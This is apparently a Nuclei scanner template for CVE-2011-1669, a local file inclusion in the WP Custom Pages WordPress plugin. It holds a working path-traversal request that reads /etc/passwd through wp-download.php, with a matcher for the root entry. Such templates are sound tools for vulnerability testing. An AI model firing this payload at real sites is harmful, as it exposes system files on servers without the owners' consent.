27 lines
625 B
YAML
27 lines
625 B
YAML
|
id: CVE-2011-1669
|
||
|
|
||
|
info:
|
||
|
name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)
|
||
|
author: daffainfo
|
||
|
severity: high
|
||
|
reference: |
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669
|
||
|
- https://www.exploit-db.com/exploits/17119
|
||
|
tags: cve,cve2011,wordpress,wp-plugin,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|